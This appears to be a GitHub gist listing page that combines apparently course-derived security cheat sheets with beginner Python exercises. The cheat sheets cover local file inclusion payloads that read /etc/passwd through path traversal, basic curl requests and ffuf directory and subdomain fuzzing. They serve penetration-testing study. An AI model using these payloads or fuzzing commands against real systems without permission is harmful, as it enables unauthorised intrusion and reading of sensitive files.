| Command | Description |
|---|---|
| Basic LFI | |
/index.php?language=/etc/passwd |
Basic LFI |
/index.php?language=../../../../etc/passwd |
LFI with path traversal |
/index.php?language=/../../../etc/passwd |
LFI with name prefix |
/index.php?language=./languages/../../../../etc/passwd |
LFI with approved path |
| LFI Bypasses |
santosadrian
/ SQL-Injection-Fundamentals.md
Created
August 1, 2023 12:43
SQL Injection Fundamentals
| Command | Description |
|---|---|
curl -h |
cURL help menu |
curl inlanefreight.com |
Basic GET request |
curl -s -O inlanefreight.com/index.html |
Download file |
curl -k https://inlanefreight.com |
Skip HTTPS (SSL) certificate validation |
curl inlanefreight.com -v |
Print full HTTP request/response details |
curl -I https://www.inlanefreight.com |
Send HEAD request (only prints response headers) |
| Command | Description |
|---|---|
ffuf -h |
ffuf help |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ |
Directory Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ |
Extension Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php |
Page Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v |
Recursive Fuzzing |
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ |
Sub-domain Fuzzing |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| There worn't be any code in this exercise or the next one, so there's no What You Should See or Study Drills either. | |
| In fact, this exercise is like one giant Study drills. I'm going to have you do a review of what you have learned | |
| so far. | |
| First, go back through every exercise you have done so far and write down every word and symbol (another name for | |
| "character" that you have used. | |
| Make sure your list of symbols is complete, | |
| Next to each word or symbol, write its name and what it does. If you can't find a name for a symbol in this book, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def add(a, b): | |
| print(f"ADDING {a} + {b}") | |
| return a + b | |
| def subtract(a, b): | |
| print(f"SUBTRACTING {a} - {b}") | |
| return a - b | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sys import argv # from module sys import object named argv | |
| script, input_file = argv # set the variables from command line | |
| def print_all(f): # defines variable that is a file and a function object ??? | |
| print(f.read()) # what do the function, prints all that is written in (f)ile | |
| def rewind(f: object) -> object: # defines function |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sys import argv # from module sys import object named argv | |
| script, input_file = argv # set the variables from command line | |
| def print_all(f): # defines variable that is a file and a function object ??? | |
| print(f.read()) # what do the function, prints all that is written in (f)ile | |
| def rewind(f: object) -> object: # defines function |
NewerOlder